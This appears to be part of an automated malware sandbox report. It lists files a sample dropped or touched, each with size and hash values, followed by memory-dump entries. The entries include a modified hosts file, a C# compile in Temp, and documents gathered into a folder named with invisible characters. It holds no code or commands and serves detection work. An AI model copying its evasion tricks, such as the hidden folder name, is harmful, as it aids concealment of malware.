1d3d35c095892562ddd2868fbd08473e48b3bb0cb64ef9ccc5550a06c88dda0d82383a1316b6c5584a49ca28ed1ef1e5ca94ec699a423a001ccd952bd6bd553d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI58922\sqlite3.dll

Filesize
608KB

MD5
bd2819965b59f015ec4233be2c06f0c1

SHA1
cff965068f1659d77be6f4942ca1ada3575ca6e2

SHA256
ab072d20cee82ae925dae78fd41cae7cd6257d14fd867996382a69592091d8ec

SHA512
f7758bd71d2ad236bf3220db0ad26f3866d9977eab311a5912f6e079b59fa918735c852de6dbf7b5fee9e04124bc0cd438c4c71edc0c04309330108ba0085d59

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI58922\unicodedata.pyd

Filesize
287KB

MD5
7a462a10aa1495cef8bfca406fb3637e

SHA1
6dcbd46198b89ef3007c76deb42ab10ba4c4cf40

SHA256
459bca991fcb88082d49d22cc6ebffe37381a5bd3efcc77c5a52f7a4bb3184c0

SHA512
d2b7c6997b4bd390257880a6f3336e88d1dd7159049811f8d7c54e3623e9b033e18e8922422869c81de72fc8c10890c173d8a958d192dd03bfc57cffaea1ac7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5gqxxtkm.zwl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\vqha15hy\vqha15hy.dll

Filesize
4KB

MD5
397b242255441bee4500596e6f3a7493

SHA1
1e7cdaa943c12ead9231c3212060147319e94d1e

SHA256
31c40104bfe42a7a0d723848d611604ada7825b5ff3b7af473b087358f6bbb22

SHA512
0c7a6fd99ca3861066b4bbfd1b14d113995ad169288ef1d87116028b6c1d1913872a5d3a4a1bfd049509732fb9be84c35446c4ea80a724190cc6e0d83bf6faf9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   ‍ \Common Files\Desktop\PublishBackup.mpeg

Filesize
1.5MB

MD5
c525dce2f544614a8dd8477e0550996d

SHA1
a7ba57f46cb45f560aec71a382586c03f07efea4

SHA256
5fb724d50e711efce7db97cd8d7b8e531bbf3559950f3f284bbe9ed1b70b7eb6

SHA512
c8fb932510fa2499a2fcb0579db450f12f3fa1dfb78f3a94d459b540a5138a9169858e952710015a77a70d4c4f19e22d51dbe1df26e6fa537aaa37894d0b9600

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   ‍ \Common Files\Documents\BackupSync.xlsx

Filesize
13KB

MD5
fc849583eb176a9ba78fc0228d61157c

SHA1
73cbb62efeda5dbbd9b99ccedf53b0f33e44e149

SHA256
2f1ae43a2076206d90d805ac3a8d30a490027580ca45d03c9e876579adb3ca95

SHA512
328fa60defda1b0b682faf17617b7a7e3f1632d44cfac5ffd573e67595bfa25f8a4765ffea03aa2261aa9cbcd2055bd123949d9e641c05354a922bc5db790493

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   ‍ \Common Files\Documents\SetClear.docx

Filesize
15KB

MD5
9baa2ecd15cd249560b80f6ecc44a4f5

SHA1
d3aceaa3615aea09e296f295bf14ee20172b7588

SHA256
59ae4dfb3602391a9e45e18f475d40589b35b907c8f2c17902fedb632b6f9cf3

SHA512
017684db97954cd1c9a7fa97f416e0cfdb7c3491be8ab89acd6d904ff661a8208cd7fed7ac56793c945be0430f4c7d58d89968e1673297707cd32464d791fbc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   ‍ \Common Files\Documents\ShowRedo.xlsx

Filesize
14KB

MD5
df5a925099566720555e1c1a675f3a71

SHA1
8f7c7994d430141268414363d166c9e951f4a628

SHA256
92df490b57fb4201bf4a974054c06a9f298ed5826c4b60a10d0215fe734bf2b7

SHA512
93c9ff1b731b0fdbdf739e0082e334eb94e8e07673583db6041a81f87ac25df06f837921e6ccbda2c7a2c9e757108db74e38fe91f8f51e8aed7049fcabbee34c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   ‍ \Common Files\Documents\StopEnter.xlsx

Filesize
11KB

MD5
8a9136edaebce7d4157c9fa6ac6f67f6

SHA1
afa02dc563bae567b2e2956731777848a9938347

SHA256
7e374e52669d0eeef7aed0be647aaa94e2abeba0f9ab875e5c2a3e3e0b263f72

SHA512
b3a92ff67aedc22a8c8dd4ac362033b65c36a4bf6fba8bab8e64c4cdfabdef25a460948ecef4d6d789e7bcda4e675ef618fd7ec5eed5dc4d31f596f0a63d0e12

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   ‍ \Common Files\Documents\SubmitPush.xlsx

Filesize
2.0MB

MD5
a67764b3642bb6d85b7dfe15c487209c

SHA1
bd4a0a225ac73ad51cec84946131dd10edc79c5a

SHA256
6c0bbf406bf334b7de05b66dfe2a819b07e7ddf585c8682105f1012115a703d4

SHA512
bcb963dc4136025aaecf12b5176215fd40fae0495718b2620fe2b0270996e2e111b7ef57824a6ca80e718813706323c52806ec81db1489c81f2267526636e47f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   ‍ \Common Files\Documents\SwitchInitialize.xlsx

Filesize
1.5MB

MD5
72d52337a03a8a49c501b5f5fac1006c

SHA1
b313be5e24b9d41289c129c0e64c00f09750b354

SHA256
fd8da97dd529d8322666859f5bc04383afc1daa3d17c614039f3b903f05d1d1a

SHA512
2b809a6a7dcb71abbd5dbe01fa2f96296396847b91a789fa3aae08f2b9322d05112fc331eadab3792bb6662f5964d6f7f266c9a4e826c698561e547e4bf5548d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   ‍ \Common Files\Downloads\CloseBackup.mpg

Filesize
1.2MB

MD5
957a2dfe67ebcf86cb4a9e8d104587bf

SHA1
b228d6aa134aca044d8550af80e967c48dd7affc

SHA256
8813594f56d7cc7714d0203c1d998b570e35caba25153cf3f418319a76a1eb85

SHA512
c2ab9427786c884b70d0ee6d7929893f4708c6dbcc00e6e0a76e180e1fe4a6839e2d9d72381eb4445007a1d8e68d972494f24df8b7faee444860c28f4d15e342

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   ‍ \Common Files\Downloads\DisableBackup.vst

Filesize
730KB

MD5
8aea276c0a8982516d0eb18e7078012a

SHA1
60bf419ad2aa04a38f11d2a223e73512e309128c

SHA256
4be3663c695a009305a4248f00a71ff04de39a2d3c630a8f69c99f6070f3baa2

SHA512
491e0db78d07eb870ac371c51bb404ebf3764f7ff9c2595dcf2b3c4dfe5abf96cca6ccc60c73818bc2e19617adf1731083e3d9e31ca93995df6f27f9e3bbd2af

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   ‍ \Common Files\Downloads\RenameImport.xls

Filesize
1.1MB

MD5
d87c39ab9b863c425efbe2a868e7df56

SHA1
eb3dded9e1d8c286f282a747cb07ca3a3c143305

SHA256
508f5169d6cb9addf7258586d636f9b1c393e7b92a87ea87a577de120301b06c

SHA512
86f03773c343124b38e6c0abf603d3e3ecadddeca238ca834dc92f60fe97e4cdcbe606c41c82bfa4af7329e23a500b4ef753fb471ef502556ae07a5b5c2b806a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   ‍ \Common Files\Downloads\UninstallStop.jpeg

Filesize
671KB

MD5
526ad4119402eb48c1a536364979de6c

SHA1
5f2697df4a01ba8550cd008191926e235f89ea43

SHA256
3d1698365ce72803c1aaea4a1c058c78a5bbbfeb56d179e5ceb92dc99f57ed22

SHA512
b4674dd8425bfebdec886dc80443f4c1028e4289ad385f42a407aeee88ef451b773c4b08421b7e05b8460e08c16441cfcb8e2efcdaaed9d5baf1548a7c57c2e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   ‍ \Common Files\Music\AddConfirm.jpg

Filesize
1.3MB

MD5
dfd6255145ea7089a1af3144ff01ed8d

SHA1
6b77e26c7699f1c98a551a924a35ed45132d2b25

SHA256
d3030f7ae933da7fbafcf9effcce52a2dbcfc0d347f1ace7c0dbe91041b181fd

SHA512
7a329ba1559e9745f1e68c6c42b37299fabf9f1ac092b1d056841d8fe4c9e5a5559de8df89b4df2c185803bd3152c8f1b50d3f4c2a5adedb6c91105ecddbab5a

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vqha15hy\CSC646FF5E0FEB4154B44977F11E8E1669.TMP

Filesize
652B

MD5
9b1b401c64428fbff57e5970254d4835

SHA1
382769568ea98017e0732508546acef683bd323b

SHA256
7b66b02976d4c2d837117a0f4417607d62245abc561ce29ac35aea5828b90c24

SHA512
582ac3a8c9e7985f7487dd7cb7af4e844e299a34701287694dd8fd3f81cfa6b9dd99fa7f805401db7b37a6a866ce26e25b598e20a9bfa22285c189ff7825254e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vqha15hy\vqha15hy.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vqha15hy\vqha15hy.cmdline

Filesize
607B

MD5
4318923ea81d24362327b07825fb7544

SHA1
0fab3f31ef7ff3850facb867d075b3628c21d808

SHA256
3d80b52cd6adb6dd0b43b869001a8b3bc1300c36f61a205f5150c9669ac1f263

SHA512
0141a3de0b06f8d7d169ba690af680cf7706cd318c16c66c2dbbba4cdf0a8fc9b27ca06cfa07414489f79b02880a816891a03b15f162da69e5fd0fbe2c475352

Download Submit
memory/3452-191-0x0000024E53300000-0x0000024E53308000-memory.dmp

Filesize
32KB

Download
memory/4928-81-0x00000190B7CC0000-0x00000190B7CE2000-memory.dmp

Filesize
136KB

Download
memory/5668-50-0x00007FFAF8DB0000-0x00007FFAF8DC9000-memory.dmp

Filesize
100KB

Download
memory/5668-80-0x00007FFAE1B60000-0x00007FFAE1C78000-memory.dmp

Filesize
1.1MB

Download
memory/5668-108-0x00007FFAF15A0000-0x00007FFAF1711000-memory.dmp

Filesize
1.4MB

Download
memory/5668-76-0x00007FFAF5F00000-0x00007FFAF5F14000-memory.dmp

Filesize
80KB

Download
memory/5668-70-0x00007FFAE2000000-0x00007FFAE246E000-memory.dmp

Filesize
4.4MB

Download
memory/5668-105-0x00007FFAF74A0000-0x00007FFAF74BF000-memory.dmp

Filesize
124KB

Download
memory/5668-73-0x00007FFAE1C80000-0x00007FFAE1FF5000-memory.dmp

Filesize
3.5MB

Download
memory/5668-74-0x00007FFAF6120000-0x00007FFAF6144000-memory.dmp

Filesize
144KB

Download
memory/5668-71-0x00007FFAF1B90000-0x00007FFAF1C48000-memory.dmp

Filesize
736KB

Download
memory/5668-253-0x00007FFAF60A0000-0x00007FFAF60CE000-memory.dmp

Filesize
184KB

Download
memory/5668-72-0x0000024EF2760000-0x0000024EF2AD5000-memory.dmp

Filesize
3.5MB

Download
memory/5668-66-0x00007FFAF60A0000-0x00007FFAF60CE000-memory.dmp

Filesize
184KB

Download
memory/5668-64-0x00007FFAF9930000-0x00007FFAF993D000-memory.dmp

Filesize
52KB

Download
memory/5668-62-0x00007FFAF60D0000-0x00007FFAF60E9000-memory.dmp

Filesize
100KB

Download
memory/5668-60-0x00007FFAF15A0000-0x00007FFAF1711000-memory.dmp

Filesize
1.4MB

Download
memory/5668-58-0x00007FFAF74A0000-0x00007FFAF74BF000-memory.dmp

Filesize
124KB

Download
memory/5668-263-0x00007FFAF1B90000-0x00007FFAF1C48000-memory.dmp

Filesize
736KB

Download
memory/5668-264-0x0000024EF2760000-0x0000024EF2AD5000-memory.dmp

Filesize
3.5MB

Download
memory/5668-30-0x00007FFAF6120000-0x00007FFAF6144000-memory.dmp

Filesize
144KB

Download
memory/5668-78-0x00007FFAF6030000-0x00007FFAF603D000-memory.dmp

Filesize
52KB

Download
memory/5668-52-0x00007FFAF60F0000-0x00007FFAF611D000-memory.dmp

Filesize
180KB

Download
memory/5668-48-0x00007FFAFAA30000-0x00007FFAFAA3F000-memory.dmp

Filesize
60KB

Download
memory/5668-25-0x00007FFAE2000000-0x00007FFAE246E000-memory.dmp

Filesize
4.4MB

Download
memory/5668-160-0x00007FFAF60D0000-0x00007FFAF60E9000-memory.dmp

Filesize
100KB

Download
memory/5668-272-0x00007FFAE1C80000-0x00007FFAE1FF5000-memory.dmp

Filesize
3.5MB

Download
memory/5668-282-0x00007FFAE2000000-0x00007FFAE246E000-memory.dmp

Filesize
4.4MB

Download
memory/5668-296-0x00007FFAE1B60000-0x00007FFAE1C78000-memory.dmp

Filesize
1.1MB

Download
memory/5668-288-0x00007FFAF15A0000-0x00007FFAF1711000-memory.dmp

Filesize
1.4MB

Download
memory/5668-287-0x00007FFAF74A0000-0x00007FFAF74BF000-memory.dmp

Filesize
124KB

Download
memory/5668-283-0x00007FFAF6120000-0x00007FFAF6144000-memory.dmp

Filesize
144KB

Download
memory/5668-328-0x00007FFAF74A0000-0x00007FFAF74BF000-memory.dmp

Filesize
124KB

Download
memory/5668-336-0x00007FFAE1B60000-0x00007FFAE1C78000-memory.dmp

Filesize
1.1MB

Download
memory/5668-323-0x00007FFAE1C80000-0x00007FFAE1FF5000-memory.dmp

Filesize
3.5MB

Download
memory/5668-335-0x00007FFAF6030000-0x00007FFAF603D000-memory.dmp

Filesize
52KB

Download
memory/5668-334-0x00007FFAF5F00000-0x00007FFAF5F14000-memory.dmp

Filesize
80KB

Download
memory/5668-333-0x00007FFAF1B90000-0x00007FFAF1C48000-memory.dmp

Filesize
736KB

Download
memory/5668-332-0x00007FFAF60A0000-0x00007FFAF60CE000-memory.dmp

Filesize
184KB

Download
memory/5668-331-0x00007FFAF9930000-0x00007FFAF993D000-memory.dmp

Filesize
52KB

Download
memory/5668-330-0x00007FFAF60D0000-0x00007FFAF60E9000-memory.dmp

Filesize
100KB

Download
memory/5668-329-0x00007FFAF15A0000-0x00007FFAF1711000-memory.dmp

Filesize
1.4MB

Download
memory/5668-327-0x00007FFAF60F0000-0x00007FFAF611D000-memory.dmp

Filesize
180KB

Download
memory/5668-326-0x00007FFAF8DB0000-0x00007FFAF8DC9000-memory.dmp

Filesize
100KB

Download
memory/5668-325-0x00007FFAFAA30000-0x00007FFAFAA3F000-memory.dmp

Filesize
60KB

Download
memory/5668-324-0x00007FFAF6120000-0x00007FFAF6144000-memory.dmp

Filesize
144KB

Download
memory/5668-308-0x00007FFAE2000000-0x00007FFAE246E000-memory.dmp

Filesize
4.4MB

Download